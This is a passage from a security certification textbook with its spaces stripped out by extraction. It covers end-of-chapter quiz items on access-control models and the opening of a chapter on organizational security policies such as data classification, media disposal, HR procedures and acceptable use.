B.Certificate-basedsecurity
C.Discretionarydatasecurity
D.Defenseindepth
9.TheproblemwiththeLow-Water-Markpolicyisthatit:A.Isaimedatensuringconfidentialityandnotintegrity
B.Couldultimatelyresultinallsubjectshavingtheintegrityleveloftheleast-trustedobjectonthesystem
C.Couldresultintheunauthorizedmodificationofdata
D.Doesnotadequatelypreventusersfromviewingfilestheyarenotentitledtoview
10.Theconceptofblockinganactionunlessitisspecificallyauthorizedis:
A.Implicitdeny
B.Leastprivilege
C.SimpleSecurityRule
D.Hierarchicaldefensemodel
EssayQuiz1.Yourcompanyhasdecidedtoincreasetheauthenticationsecurity
byrequiringremoteemployeestouseasecuritytokenaswellasa
passwordtologontothenetwork.Theemployeesaregrumblingaboutthenewrequirementsbecausetheydon’twanttohavetocarryaroundthetokenwiththemanddon’tunderstandwhyit’snecessary.Writeabriefmemotothestafftoeducatethemonthegeneralwaysthatauthenticationcanbeperformed.Thenexplainwhyyourcompanyhasdecidedtousesecuritytokensinadditiontopasswords.
2.ThenewCEOforyourcompanyjustretiredfromthemilitaryandwantstousesomeofthesamecomputersystemsandsecuritysoftwaresheusedwhilewiththemilitary.Explaintoherthereasonsthatconfidentiality-basedsecuritymodelsarenotadequateforallenvironments.Provideatleasttwoexamplesofenvironmentswhereaconfidentiality-basedsecuritymodelisnotsufficient.
3.Describewhytheconceptof“securitythroughobscurity”isgenerallyconsideredabadprincipletorelyon.Providesomereal-worldexamplesofwhereyouhaveseenthisprincipleused.
4.Writeabriefessaydescribingtheprincipleofleastprivilegeandhowitcanbeemployedtoenhancesecurity.Provideatleasttwoexamplesofenvironmentsinwhichitcanbeusedforsecuritypurposes.
LabProjects
•LabProject2.1Inanenvironmentfamiliartoyou(yourschoolorwhereyouwork,forexample),determinewhethertheprincipleofdiversityofdefensehasbeenemployedandlistthedifferentlayersofsecuritythatareemployed.Discusswhetheryouthinktheyaresufficientandwhethertheprincipleofdiversityofdefensehasalsobeenused.
•LabProject2.2
Pickanoperatingsystemthatenforcessomeformofaccesscontrolanddeterminehowitisimplementedinthatsystem.
chapter3 OperationalandOrganizationalSecurity
Wewillbankruptourselvesinthevainsearchforabsolutesecurity.
—DWIGHTDAVIDEISENHOWER
O
Inthischapter,youwilllearnhowto
Identifyvariousoperationalaspectstosecurityinyourorganization
Identifyvariouspoliciesandproceduresinyourorganization
Identifythesecurityawarenessandtrainingneedsofanorganization
Understandthedifferenttypesofagreementsemployedinnegotiatingsecurityrequirements
Describethephysicalsecuritycomponentsthatcanprotectyourcomputersandnetwork
Identifyenvironmentalfactorsthatcanaffectsecurity
Identifyfactorsthataffectthesecurityofthegrowingnumberofwirelesstechnologiesusedfordatatransmission
Preventdisclosurethroughelectronicemanations
rganizationsachieveoperationalsecuritythroughpoliciesandproceduresthatguideuser’sinteractionswithdataanddataprocessingsystems.Developingandaligningtheseeffortswiththegoalsofthe
businessisacrucialpartofdevelopingasuccessfulsecurityprogram.Onemethodofensuringcoverageistoaligneffortswiththeoperationalsecuritymodeldescribedinthelastchapter.Thisbreakseffortsintogroups;prevention,detection,andresponseelements.Preventiontechnologiesaredesignedtokeepindividualsfrombeing
abletogainaccesstosystemsordatatheyarenotauthorizedtouse.Originally,thiswasthesoleapproachtosecurity.Eventuallywelearnedthatinanoperationalenvironment,preventionisextremelydifficultandrelyingonpreventiontechnologiesaloneisnotsufficient.Thisledtotheriseoftechnologiestodetectandrespondtoeventsthatoccurwhenpreventionfails.Together,thepreventiontechnologiesandthedetectionandresponsetechnologiesformtheoperationalmodelforcomputersecurity.
Policies,Procedures,Standards,andGuidelinesAnimportantpartofanyorganization’sapproachtoimplementingsecurityarethepolicies,procedures,standards,andguidelinesthatareestablishedtodetailwhatusersandadministratorsshouldbedoingtomaintainthesecurityofthesystemsandnetwork.Collectively,thesedocumentsprovidetheguidanceneededtodeterminehowsecuritywillbeimplementedintheorganization.Giventhisguidance,thespecifictechnologyandsecuritymechanismsrequiredcanbeplannedfor.Policiesarehigh-level,broadstatementsofwhattheorganizationwants
toaccomplish.Theyaremadebymanagementwhenlayingouttheorganization’spositiononsomeissue.Proceduresarethestep-by-stepinstructionsonhowtoimplementpoliciesintheorganization.Theydescribeexactlyhowemployeesareexpectedtoactinagivensituationortoaccomplishaspecifictask.Standardsaremandatoryelementsregardingtheimplementationofapolicy.Theyareacceptedspecificationsthatprovidespecificdetailsonhowapolicyistobeenforced.Somestandardsareexternallydriven.Regulationsforbankingandfinancialinstitutions,forexample,requirecertainsecuritymeasuresbetakenbylaw.Otherstandardsmaybesetbytheorganizationtomeetitsownsecuritygoals.Guidelinesarerecommendationsrelatingtoapolicy.Thekeyterminthiscaseisrecommendations—guidelinesarenotmandatorysteps.
Thesedocumentsguidehowsecuritywillbeimplementedintheorganization:Policies High-level,broadstatementsofwhattheorganizationwantstoaccomplishProcedures Step-by-stepinstructionsonhowtoimplementthepoliciesStandards MandatoryelementsregardingtheimplementationofapolicyGuidelines Recommendationsrelatingtoapolicy
Justasthenetworkitselfconstantlychanges,thepolicies,procedures,standards,andguidelinesshouldbeincludedinlivingdocumentsthatare
periodicallyevaluatedandchangedasnecessary.Theconstantmonitoringofthenetworkandtheperiodicreviewoftherelevantdocumentsarepartoftheprocessthatistheoperationalmodel.Whenappliedtopolicies,thisprocessresultsinwhatisknownasthepolicylifecycle.Thisoperationalprocessandpolicylifecycleroughlyconsistoffourstepsinrelationtoyoursecuritypoliciesandsolutions:
1.Plan(adjust)forsecurityinyourorganization.2.Implementtheplans.3.Monitortheimplementation.4.Evaluatetheeffectiveness.
Inthefirststep,youdevelopthepolicies,procedures,andguidelinesthatwillbeimplementedanddesignthesecuritycomponentsthatwillprotectyournetwork.Thereareavarietyofgoverninginstruments,fromstandardstocompliancerulesthatwillprovideboundariesforthesedocuments.Oncethesedocumentsaredesignedanddeveloped,youcanimplementtheplans.Partoftheimplementationofanypolicy,procedure,orguidelineisaninstructionperiodduringwhichthosewhowillbeaffectedbythechangeorintroductionofthisnewdocumentlearnaboutitscontents.Next,youmonitortoensurethatboththehardwareandthesoftwareaswellasthepolicies,procedures,andguidelinesareeffectiveinsecuringyoursystems.Finally,youevaluatetheeffectivenessofthesecuritymeasuresyouhaveinplace.Thisstepmayincludeavulnerabilityassessment(anattempttoidentifyandprioritizethelistofvulnerabilitieswithinasystemornetwork)andapenetrationtest(amethodtocheckthesecurityofasystembysimulatinganattackbyamaliciousindividual)ofyoursystemtoensurethesecurityisadequate.Afterevaluatingyoursecurityposture,youbeginagainwithstepone,thistimeadjustingthesecuritymechanismsyouhaveinplace,andthencontinuewiththiscyclicalprocess.Regardingsecurity,everyorganizationshouldhaveseveralcommon
policiesinplace(inadditiontothosealreadydiscussedrelativetoaccesscontrolmethods).Theseinclude,butarenotlimitedto,securitypoliciesregardingchangemanagement,classificationofinformation,acceptableuse,duecareandduediligence,dueprocess,needtoknow,disposalanddestructionofdata,servicelevelagreements,humanresourcesissues,codesofethics,andpoliciesgoverningincidentresponse.
SecurityPoliciesInkeepingwiththehigh-levelnatureofpolicies,thesecuritypolicyisahigh-levelstatementproducedbyseniormanagementthatoutlinesbothwhatsecuritymeanstotheorganizationandtheorganization’sgoalsforsecurity.Themainsecuritypolicycanthenbebrokendownintoadditionalpoliciesthatcoverspecifictopics.Statementssuchas“thisorganizationwillexercisetheprincipleofleastaccessinitshandlingofclientinformation”wouldbeanexampleofasecuritypolicy.Thesecuritypolicycanalsodescribehowsecurityistobehandledfromanorganizationalpointofview(suchasdescribingwhichofficeandcorporateofficerormanageroverseestheorganization’ssecurityprogram).Inadditiontopoliciesrelatedtoaccesscontrol,theorganization’s
securitypolicyshouldincludethespecificpoliciesdescribedinthenextsections.Allpoliciesshouldbereviewedonaregularbasisandupdatedasneeded.Generally,policiesshouldbeupdatedlessfrequentlythantheproceduresthatimplementthem,sincethehigh-levelgoalswillnotchangeasoftenastheenvironmentinwhichtheymustbeimplemented.Allpoliciesshouldbereviewedbytheorganization’slegalcounsel,andaplanshouldbeoutlinedthatdescribeshowtheorganizationwillensurethatemployeeswillbemadeawareofthepolicies.Policiescanalsobemadestrongerbyincludingreferencestotheauthoritywhomadethepolicy(whetherthispolicycomesfromtheCEOorisadepartment-levelpolicy,forexample)andreferencestoanylawsorregulationsthatareapplicabletothespecificpolicyandenvironment.
ChangeManagementPolicyThepurposeofchangemanagementistoensureproperproceduresarefollowedwhenmodificationstotheITinfrastructurearemade.Thesemodificationscanbepromptedbyanumberofdifferentevents,includingnewlegislation,updatedversionsofsoftwareorhardware,implementationofnewsoftwareorhardware,orimprovementstotheinfrastructure.Theterm“management”impliesthatthisprocessshouldbecontrolledinsomesystematicway,andthatisindeedthepurpose.Changestotheinfrastructuremighthaveadetrimentalimpactonoperations.Newversionsofoperatingsystemsorapplicationsoftwaremightbeincompatiblewithothersoftwareorhardwaretheorganizationisusing.Withoutaprocesstomanagethechange,anorganizationmightsuddenlyfinditselfunabletoconductbusiness.Achangemanagementprocessshouldincludevariousstages,includingamethodtorequestachangetotheinfrastructure,areviewandapprovalprocessfortherequest,anexaminationoftheconsequencesofthechange,resolution(ormitigation)ofanydetrimentaleffectsthechangemightincur,implementationofthechange,anddocumentationoftheprocessasitrelatedtothechange.
DataPoliciesSystemintegrationwiththirdpartiesfrequentlyinvolvesthesharingofdata.Datacanbesharedforthepurposeofprocessingorstorage.Controloverdataisasignificantissueinthird-partyrelationships.Therearenumerousquestionsthatneedtobeaddressed.Thequestionofwhoownsthedata,boththedatasharedwiththirdpartiesandsubsequentdatadevelopedaspartoftherelationship,isanissuethatneedstobeestablished.
DataOwnershipDatarequiresadataowner.Dataownershiprolesforalldataelementsneedtobedefinedinthebusiness.Dataownershipisabusinessfunction,
wheretherequirementsforsecurity,privacy,retention,andotherbusinessfunctionsmustbeestablished.Notalldatarequiresthesamehandlingrestrictions,butalldatarequiresthesecharacteristicstobedefined.Thisistheresponsibilityofthedataowner.
UnauthorizedDataSharingUnauthorizeddatasharingcanbeasignificantissue,andintoday’sworld,datahasvalueandisfrequentlyusedforsecondarypurposes.Ensuringthatallpartiesintherelationshipunderstandthedata-sharingrequirementsisanimportantprerequisite.Equallyimportantisensuringthatallpartiesunderstandthesecurityrequirementsofshareddata.
DataBackupsDataownershiprequirementsincludebackupresponsibilities.Databackuprequirementsincludedeterminingthelevelofbackup,restoreobjectives,andlevelofprotectionrequirements.ThesecanbedefinedbythedataownerandthenexecutedbyoperationalITpersonnel.Determiningthebackupresponsibilitiesanddevelopingthenecessaryoperationalprocedurestoensurethatadequatebackupsoccurareimportantsecurityelements.
ClassificationofInformationAkeycomponentofITsecurityistheprotectionoftheinformationprocessedandstoredonthecomputersystemsandnetwork.Organizationsdealwithmanydifferenttypesofinformation,andtheyneedtorecognizethatnotallinformationisofequalimportanceorsensitivity.Thisrequiresclassificationofinformationintovariouscategories,eachwithitsownrequirementsforitshandling.Factorsthataffecttheclassificationofspecificinformationincludeitsvaluetotheorganization(whatwillbetheimpacttotheorganizationifitlosesthisinformation?),itsage,andlawsorregulationsthatgovernitsprotection.ThemostwidelyknownsystemofclassificationofinformationisthatimplementedbytheU.S.government
(includingthemilitary),whichclassifiesinformationintocategoriessuchasConfidential,Secret,andTopSecret.BusinesseshavesimilardesirestoprotectinformationandoftenusecategoriessuchasPubliclyReleasable,Proprietary,CompanyConfidential,andForInternalUseOnly.Eachpolicyfortheclassificationofinformationshoulddescribehowitshouldbeprotected,whomayhaveaccesstoit,whohastheauthoritytoreleaseitandhow,andhowitshouldbedestroyed.Allemployeesoftheorganizationshouldbetrainedintheproceduresforhandlingtheinformationthattheyareauthorizedtoaccess.Discretionaryandmandatoryaccesscontroltechniquesuseclassificationsasamethodtoidentifywhomayhaveaccesstowhatresources.
TechTip
DataClassificationInformationclassificationcategoriesyoushouldbeawareoffortheCompTIASecurity+examinclude:High,Medium,Low,Confidential,Private,andPublic.
DataLabeling,Handling,andDisposalEffectivedataclassificationprogramsincludedatalabeling,whichenablespersonnelworkingwiththedatatoknowwhetheritissensitiveandtounderstandthelevelsofprotectionrequired.Whenthedataisinsideaninformation-processingsystem,theprotectionsshouldbedesignedintothesystem.Butwhenthedataleavesthiscocoonofprotection,whetherbyprinting,downloading,orcopying,itbecomesnecessarytoensurecontinuedprotectionbyothermeans.Thisiswheredatalabelingassistsusersinfulfillingtheirresponsibilities.Trainingtoensurethatlabelingoccursandthatitisusedandfollowedisimportantforuserswhoserolescanbeimpactedbythismaterial.Trainingplaysanimportantroleinensuringproperdatahandlingand
disposal.Personnelareintimatelyinvolvedinseveralspecifictasks
associatedwithdatahandlinganddatadestruction/disposaland,ifproperlytrained,canactasasecuritycontrol.Untrainedorinadequatelytrainedpersonnelwillnotbeaproductivesecuritycontroland,infact,canbeasourceofpotentialcompromise.
NeedtoKnowAnothercommonsecurityprincipleisthatofneedtoknow,whichgoeshand-in-handwithleastprivilege.Theguidingfactorhereisthateachindividualintheorganizationissuppliedwithonlytheabsoluteminimumamountofinformationandprivilegesheorsheneedstoperformtheirworktasks.Toobtainaccesstoanypieceofinformation,theindividualmusthaveajustifiedneedtoknow.Apolicyspellingoutthesetwoprinciplesasguidingphilosophiesfortheorganizationshouldbecreated.Thepolicyshouldalsoaddresswhointheorganizationcangrantaccesstoinformationandwhocanassignprivilegestoemployees.
DisposalandDestructionPolicyManypotentialintrudershavelearnedthevalueofdumpsterdiving.Anorganizationmustbeconcernedaboutnotonlypapertrashanddiscardedobjects,butalsotheinformationstoredondiscardedobjectssuchascomputers.Severalgovernmentorganizationshavebeenembarrassedwhenoldcomputerssoldtosalvagersprovedtocontainsensitivedocumentsontheirharddrives.Itiscriticalforeveryorganizationtohaveastrongdisposalanddestructionpolicyandrelatedprocedures.Importantpapersshouldbeshredded,andimportantinthiscasemeans
anythingthatmightbeusefultoapotentialintruder.Itisamazingwhatintruderscandowithwhatappeartobeinnocentpiecesofinformation.Beforemagneticstoragemedia(suchasdisksortapes)isdiscardedin
thetrashorsoldforsalvage,itshouldhaveallfilesdeleted,andshouldbeoverwrittenatleastthreetimeswithall1’s,all0’s,andthenrandomcharacters.Commercialproductsareavailabletodestroyfilesusingthisprocess.Itisnotsufficientsimplytodeleteallfilesandleaveitatthat,
sincethedeletionprocessaffectsonlythepointerstowherethefilesarestoredanddoesn’tactuallygetridofallthebitsinthefile.Thisiswhyitispossibleto“undelete”filesandrecoverthemaftertheyhavebeendeleted.Asafermethodfordestroyingfilesfromastoragedeviceistodestroy
thedatamagnetically,usingastrongmagneticfieldtodegaussthemedia.Thiseffectivelydestroysalldataonthemedia.Severalcommercialdegaussersareavailableforthispurpose.Anothermethodthatcanbeusedonharddrivesistouseafileonthem(thesortoffileyou’dfindinahardwarestore)andactuallyfileoffthemagneticmaterialfromthesurfaceoftheplatter.Shreddingfloppymediaisnormallysufficient,butsimplycuttingafloppydiskintoafewpiecesisnotenough—datahasbeensuccessfullyrecoveredfromfloppiesthatwerecutintoonlyacoupleofpieces.CDsandDVDsalsoneedtobedisposedofappropriately.Manypapershreddersnowhavetheabilitytoshredtheseformsofstoragemedia.Insomehighlysecureenvironments,theonlyacceptablemethodofdisposingofharddrivesandotherstoragedevicesistheactualphysicaldestructionofthedevices.Matchingthesecurityactiontothelevelofriskisimportanttorecognizeinthisinstance.Destroyingharddrivesthatdonothavesensitiveinformationiswasteful;properfilescrubbingisprobablyappropriate.Fordriveswithultra-sensitiveinformation,physicaldestructionmakessense.Thereisnosingleanswer,butasinmostthingsassociatedwithinformationsecurity,thebestpracticeistomatchtheactiontothelevelofrisk.
HumanResourcesPoliciesIthasbeensaidthattheweakestlinksinthesecuritychainarethehumans.Consequently,itisimportantfororganizationstohavepoliciesinplacerelativetotheiremployees.Policiesthatrelatetothehiringofindividualsareprimarilyimportant.Theorganizationneedstomakesurethatithiresindividualswhocanbetrustedwiththeorganization’sdataandthatofitsclients.Onceemployeesarehired,theyshouldbekeptfromslippingintothecategoryof“disgruntledemployee.”Finally,policiesmustbe
developedtoaddresstheinevitablepointinthefuturewhenanemployeeleavestheorganization—eitheronhisorherownorwiththe“encouragement”oftheorganizationitself.Securityissuesmustbeconsideredateachofthesepoints.
ManyorganizationsoverlookthesecurityimplicationsthatdecisionsbyHumanResourcesmayhave.HumanResourcespersonnelandsecuritypersonnelshouldhaveacloseworkingrelationship.Decisionsonthehiringandfiringofpersonnelhavedirectsecurityimplicationsfortheorganization.Asaresult,proceduresshouldbeinplacethatspecifywhichactionsmustbetakenwhenanemployeeishired,isterminated,orretires.
CodeofEthicsNumerousprofessionalorganizationshaveestablishedcodesofethicsfortheirmembers.Eachofthesedescribestheexpectedbehavioroftheirmembersfromahigh-levelstandpoint.Organizationscanadoptthisideaaswell.Fororganizations,acodeofethicscansetthetoneforhowemployeeswillbeexpectedtoactandtoconductbusiness.Thecodeshoulddemandhonestyfromemployeesandrequirethattheyperformallactivitiesinaprofessionalmanner.Thecodecouldalsoaddressprinciplesofprivacyandconfidentialityandstatehowemployeesshouldtreatclientandorganizationaldata.Conflictsofinterestcanoftencauseproblems,sothiscouldalsobecoveredinthecodeofethics.Byoutliningacodeofethics,theorganizationcanencouragean
environmentthatisconducivetointegrityandhighethicalstandards.Foradditionalideasonpossiblecodesofethics,checkprofessionalorganizationssuchastheInstituteforElectricalandElectronicsEngineers(IEEE),theAssociationforComputingMachinery(ACM),ortheInformationSystemsSecurityAssociation(ISSA).
TechTip
HiringHackersHiringaskilledhackermaymakesensefromatechnicalskillspointofview,butanorganizationalsohastoconsiderthebroaderethicalandbusinessconsequencesandassociatedrisks.Isthehackercompletelyreformedornot?Howmuchtimeisneededtodeterminethis?Therealquestionisnot“Wouldyouhireahacker?”butrather“Canyoufireahackeroncehehashadaccesstoyoursystems?”Trustisanimportantissuewithemployeeswhohavesystemadministratoraccess,andthelong-termramificationsneedtobeconsidered.
JobRotationAninterestingapproachtoenhancesecuritythatisgainingincreasingattentionisjobrotation.Organizationsoftendiscussthebenefitsofrotatingindividualsthroughvariousjobsinanorganization’sITdepartment.Byrotatingthroughjobs,individualsgainabetterperspectiveonhowthevariouspartsofITcanenhance(orhinder)thebusiness.SincesecurityisoftenamisunderstoodaspectofIT,rotatingindividualsthroughsecuritypositionscanresultinamuchwiderunderstandingthroughouttheorganizationaboutpotentialsecurityproblems.Italsocanhavethesidebenefitofacompanynothavingtorelyonanyoneindividualtooheavilyforsecurityexpertise.Ifallsecuritytasksarethedomainofoneemployee,andthatindividualleavessuddenly,securityattheorganizationcouldsuffer.Ontheotherhand,ifsecuritytasksareunderstoodbymanydifferentindividuals,thelossofanyoneindividualhaslessofanimpactontheorganization.
EmployeeHiringandPromotionsItisbecomingcommonfororganizationstorunbackgroundchecksonprospectiveemployeesandtocheckthereferencesprospectiveemployeessupply.Frequently,organizationsrequiredrugtesting,checkforanypastcriminalactivity,verifyclaimededucationalcredentials,andconfirmreportedworkhistory.Forhighlysensitiveenvironments,specialsecuritybackgroundinvestigationscanalsoberequired.Makesurethatyourorganizationhiresthemostcapableandtrustworthyemployees,andthatyourpoliciesaredesignedtoensurethis.
Afteranindividualhasbeenhired,yourorganizationneedstominimizetheriskthattheemployeewillignorecompanyrulesandaffectsecurity.Periodicreviewsbysupervisorypersonnel,additionaldrugchecks,andmonitoringofactivityduringworkmayallbeconsideredbytheorganization.Iftheorganizationchoosestoimplementanyofthesereviews,thismustbespecifiedintheorganization’spolicies,andprospectiveemployeesshouldbemadeawareofthesepoliciesbeforebeinghired.Whatanorganizationcandointermsofmonitoringandrequiringdrugtests,forexample,canbeseverelyrestrictedifnotspelledoutinadvanceastermsofemployment.Newhiresshouldbemadeawareofallpertinentpolicies,especiallythoseapplyingtosecurity,andshouldbeaskedtosigndocumentsindicatingthattheyhavereadandunderstoodthem.
TechTip
AccountsofFormerEmployeesWhenconductingsecurityassessmentsoforganizations,securityprofessionalsfrequentlyfindactiveaccountsforindividualswhonolongerworkforthecompany.Thisisespeciallytrueforlargerorganizations,whichmaylackaclearprocessforthepersonnelofficetocommunicatewiththenetworkadministratorswhenanemployeeleavestheorganization.Theseoldaccounts,however,areaweakpointinthesecurityperimeterfortheorganizationandshouldbeeliminated.
Occasionallyanemployee’sstatuswillchangewithinthecompany.Ifthechangecanbeconstruedasanegativepersonnelaction(suchasademotion),supervisorsshouldbealertedtowatchforchangesinbehaviorthatmightindicatetheemployeeiscontemplatingorconductingunauthorizedactivity.Itislikelythattheemployeewillbeupset,andwhetherheactsonthistothedetrimentofthecompanyissomethingthatneedstobeguardedagainst.Inthecaseofademotion,theindividualmayalsolosecertainprivilegesoraccessrights,andthesechangesshouldbemadequicklysoastolessenthelikelihoodthattheemployeewilldestroy
previouslyaccessibledataifhebecomesdisgruntledanddecidestotakerevengeontheorganization.Ontheotherhand,iftheemployeeispromoted,privilegesmaystillchange,buttheneedtomakethechangetoaccessprivilegesmaynotbeasurgent,thoughitshouldstillbeaccomplishedasquicklyaspossible.Ifthemoveisalateralone,changesmayalsoneedtotakeplace,andagaintheyshouldbeaccomplishedasquicklyaspossible.
Retirement,Separation,orTerminationofanEmployeeAnemployeeleavinganorganizationcanbeeitherapositiveoranegativeaction.Employeeswhoareretiringbytheirownchoicemayannouncetheirplannedretirementweeksorevenmonthsinadvance.Limitingtheiraccesstosensitivedocumentsthemomenttheyannouncetheirintentionmaybethesafestthingtodo,butitmightnotbenecessary.Eachsituationshouldbeevaluatedindividually.Ifthesituationisaforcedretirement,theorganizationmustdeterminetherisktoitsdataiftheemployeebecomesdisgruntledasaresultoftheaction.Inthissituation,thewisestchoicemightbetocutofftheemployee’saccessquicklyandprovideherwithsomeadditionalvacationtime.Thismightseemlikeanexpensiveproposition,butthedangertothecompanyofhavingadisgruntledemployeemayjustifyit.Again,eachcaseshouldbeevaluatedindividually.
Itisbettertogiveapotentiallydisgruntledemployeeseveralweeksofpaidvacationthantohavehimtrashsensitivefilestowhichhehasaccess.Becauseemployeestypicallyknowthepatternofmanagementbehaviorwithrespecttotermination,doingtherightthingwillpaydividendsinthefutureforafirm.
Whenanemployeedecidestoleaveacompany,generallyasaresultofanewjoboffer,continuedaccesstosensitiveinformationshouldbecarefullyconsidered.Iftheemployeeisleavingasaresultofhardfeelingstowardthecompany,itmightbewisetoquicklyrevokeheraccess
privileges.Iftheemployeeisleavingtheorganizationbecauseheisbeing
terminated,youshouldassumethatheisorwillbecomedisgruntled.Whileitmaynotseemthefriendliestthingtodo,anemployeeinthissituationshouldimmediatelyhavehisaccessprivilegestosensitiveinformationandfacilitiesrevoked.Combinationsshouldalsobequicklychangedonceanemployeehas
beeninformedoftheirtermination.Accesscards,keys,andbadgesshouldbecollected;theemployeeshouldbeescortedtoherdeskandwatchedasshepackspersonalbelongings;andthensheshouldbeescortedfromthebuilding.
Organizationscommonlyneglecttohaveapolicythatmandatestheremovalofanindividual’scomputeraccessupontermination.Notonlyshouldsuchapolicyexist,butitshouldalsoincludetheprocedurestoreclaimand“clean”aterminatedemployee’scomputersystemandaccounts.
MandatoryVacationsOrganizationshaveprovidedvacationtimetotheiremployeesformanyyears.Few,however,forceemployeestotakethistimeiftheydon’twantto.Atsomecompanies,employeesaregiventhechoicetoeither“useorlose”theirvacationtime;iftheydonottakealloftheirvacationtime,theyloseatleastaportionofit.Fromasecuritystandpoint,anemployeewhonevertakestimeoffmightbeinvolvedinnefariousactivity,suchasfraudorembezzlement,andmightbeafraidthatifheleavesonvacation,theorganizationwilldiscoverhisillicitactivities.Asaresult,requiringemployeestousetheirvacationtimethroughapolicyofmandatoryvacationscanbeasecurityprotectionmechanism.Usingmandatoryvacationsasatooltodetectfraudwillrequirethatsomebodyelsealsobetrainedinthefunctionsoftheemployeewhoisonvacation.Havingasecondpersonfamiliarwithsecurityproceduresisalsoagoodpolicyin
casesomethinghappenstotheprimaryemployee.
On-boarding/Off-boardingBusinessPartnersJustasitisimportanttomanagetheon-andoff-boardingprocessesofcompanypersonnel,itisimportanttoconsiderthesametypesofelementswhenmakingarrangementswiththirdparties.Agreementswithbusinesspartnerstendtobefairlyspecificwithrespecttotermsassociatedwithmutualexpectationsassociatedwiththeprocessofthebusiness.Considerationsregardingtheon-boardingandoff-boardingprocessesareimportant,especiallytheoff-boarding.Whenacontractarrangementwithathirdpartycomestoanend,issuesastodataretentionanddestructionbythethirdpartyneedtobeaddressed.Theseconsiderationsneedtobemadepriortotheestablishmentoftherelationship,notaddedatthetimethatitiscomingtoanend.
On-boardingandoff-boardingbusinessproceduresshouldbewelldocumentedtoensurecompliancewithlegalrequirements.
SocialMediaNetworksTheriseofsocialmedianetworkshaschangedmanyaspectsofbusiness.Whetherusedformarketing,communications,customerrelations,orsomeotherpurpose,socialmedianetworkscanbeconsideredaformofthirdparty.Oneofthechallengesinworkingwithsocialmedianetworksand/orapplicationsistheirtermsofuse.Whilearelationshipwithatypicalthirdpartyinvolvesanegotiatedsetofagreementswithrespecttorequirements,thereisnonegotiationwithsocialmedianetworks.Theonlyoptionistoadopttheirtermsofservice,soitisimportanttounderstandtheimplicationsofthesetermswithrespecttothebusinessuseofthesocialnetwork.
AcceptableUsePolicyAnacceptableusepolicy(AUP)outlineswhattheorganizationconsiderstobetheappropriateuseofcompanyresources,suchascomputersystems,e-mail,Internetaccess,andnetworks.Organizationsshouldbeconcernedaboutpersonaluseoforganizationalassetsthatdoesnotbenefitthecompany.ThegoaloftheAUPistoensureemployeeproductivitywhilelimiting
organizationalliabilitythroughinappropriateuseoftheorganization’sassets.TheAUPshouldclearlydelineatewhatactivitiesarenotallowed.Itshouldaddressissuessuchastheuseofresourcestoconductpersonalbusiness,installationofhardwareorsoftware,remoteaccesstosystemsandnetworks,thecopyingofcompany-ownedsoftware,andtheresponsibilityofuserstoprotectcompanyassets,includingdata,software,andhardware.Statementsregardingpossiblepenaltiesforignoringanyofthepolicies(suchastermination)shouldalsobeincluded.Relatedtoappropriateuseoftheorganization’scomputersystemsand
networksbyemployeesistheappropriateusebytheorganization.Themostimportantofsuchissuesiswhethertheorganizationconsidersitappropriatetomonitortheemployees’useofthesystemsandnetwork.Ifmonitoringisconsideredappropriate,theorganizationshouldincludeastatementtothiseffectinthebannerthatappearsatlogin.Thisrepeatedlywarnsemployees,andpossibleintruders,thattheiractionsaresubjecttomonitoringandthatanymisuseofthesystemwillnotbetolerated.Shouldtheorganizationneedtouseinacivilorcriminalcaseanyinformationgatheredduringmonitoring,theissueofwhethertheemployeehadanexpectationofprivacy,orwhetheritwasevenlegalfortheorganizationtobemonitoring,issimplifiediftheorganizationcanpointtoastatementthatisalwaysdisplayedthatinstructsusersthatuseofthesystemconstitutesconsenttomonitoring.Beforeanymonitoringisconducted,ortheactualwordingonthewarningmessageiscreated,theorganization’slegalcounselshouldbeconsultedtodeterminetheappropriatewaytoaddressthisissueintheparticularjurisdiction.
Intoday’shighlyconnectedenvironment,everyorganizationshouldhaveanAUPthatspellsouttoallemployeeswhattheorganizationconsidersappropriateandinappropriateuseofitscomputingandnetworksresources.Havingthispolicymaybecriticalshouldtheorganizationneedtotakedisciplinaryactionsbasedonanabuseofitsresources.
InternetUsagePolicyIntoday’shighlyconnectedenvironment,employeeuseofaccesstotheInternetisofparticularconcern.ThegoaloftheInternetusagepolicyistoensuremaximumemployeeproductivityandtolimitpotentialliabilitytotheorganizationfrominappropriateuseoftheInternetinaworkplace.TheInternetprovidesatremendoustemptationforemployeestowastehoursastheysurftheWebforthescoresofgamesfromthepreviousnight,conductquickonlinestocktransactions,orreadthereviewofthelatestblockbustermovieeveryoneistalkingabout.Inaddition,allowingemployeestovisitsitesthatmaybeconsideredoffensivetoothers(suchaspornographicorhatesites)canopenthecompanytoaccusationsofcondoningahostileworkenvironmentandresultinlegalliability.TheInternetusagepolicyneedstoaddresswhatsitesemployeesare
allowedtovisitandwhatsitestheyarenotallowedtovisit.IfthecompanyallowsthemtosurftheWebduringnonworkhours,thepolicyneedstoclearlyspellouttheacceptableparameters,intermsofwhentheyareallowedtodothisandwhatsitestheyarestillprohibitedfromvisiting(suchaspotentiallyoffensivesites).Thepolicyshouldalsodescribeunderwhatcircumstancesanemployeewouldbeallowedtopostsomethingfromtheorganization’snetworkontheWeb(onablog,forexample).Anecessaryadditiontothispolicywouldbetheprocedureforanemployeetofollowtoobtainpermissiontoposttheobjectormessage.
E-MailUsagePolicyRelatedtotheInternetusagepolicyisthee-mailusagepolicy,whichdeals
withwhatthecompanywillallowemployeestosendin,orasattachmentsto,e-mailmessages.Thispolicyshouldspelloutwhethernonworke-mailtrafficisallowedatallorisatleastseverelyrestricted.Itneedstocoverthetypeofmessagethatwouldbeconsideredinappropriatetosendtootheremployees(forexample,nooffensivelanguage,nosex-relatedorethnicjokes,noharassment,andsoon).Thepolicyshouldalsospecifyanydisclaimersthatmustbeattachedtoanemployee’smessagesenttoanindividualoutsidethecompany.Thepolicyshouldremindemployeesoftherisksofclickingonlinksine-mails,oropeningattachments,asthesecanbesocialengineeringattacks.
CleanDeskPolicyPreventingaccesstoinformationisalsoimportantintheworkarea.Firmswithsensitiveinformationshouldhavea“cleandeskpolicy”specifyingthatsensitiveinformationmustnotbeleftunsecuredintheworkareawhentheworkerisnotpresenttoactascustodian.Evenleavingthedeskareaandgoingtothebathroomcanleaveinformationexposedandsubjecttocompromise.Thecleandeskpolicyshouldidentifyandprohibitthingsthatarenotobviousuponfirstglance,suchaspasswordsonstickynotesunderkeyboardsandmousepadsorinunsecureddeskdrawers.Alloftheseelementsthatdemonstratetheneedforacleandeskarelostifemployeesdonotmakethempersonal.Trainingforcleandeskactivitiesneedstomaketheissueapersonalone,whereconsequencesareunderstoodandtheworkplacereinforcesthepositiveactivity.
